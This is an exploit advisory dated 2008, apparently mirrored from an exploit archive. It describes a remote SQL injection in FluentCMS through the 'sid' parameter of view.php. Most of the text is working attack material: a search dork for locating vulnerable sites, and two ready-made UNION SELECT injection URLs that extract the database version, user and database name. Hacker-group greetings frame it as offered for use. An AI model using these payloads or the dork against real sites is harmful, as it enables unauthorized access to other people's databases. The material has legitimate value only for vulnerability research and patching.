FluentCMS (view.php sid) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FluentCMS (view.php sid) Remote SQL Injection Vulnerability
# Published : 2008-04-27
# Author : cO2
# Previous Title : Jokes Site Script (jokes.php?catagorie) SQL Injection Vulnerability
# Next Title : Content Management System for Phprojekt 0.6.1 File Disclosure Vuln

###################################################
[~] FluentCMS Remote Sql ?°nj. Vuln.
                                                                                                              
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greatz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: c02@Hotmail.de
[~] Greetz2 : Str0ke,Inphex,DigitalMind,His0k4,Stack-Terrorist,mArEzZinA,Waraxe,Str0xo
[~] Speacial thanks to : Inphex
[~] Dork :  Powered by FluentCMS
[~] Exploit :
http://www.xxx.org/view.php?sid=-5926+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(version())),17,unhex(hex(user())),unhex(hex(database())),20,21,22,23,24,25,26,27,28,29,30,31,32--
or
http://www.xxx.org/view.php?sid=-3+union+select+1,2,3,unhex(hex(user())),5,6,7,unhex(hex(database())),9,10,11,12,13,14,unhex(hex(version())),16--
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# www.Syue.com [2008-04-27]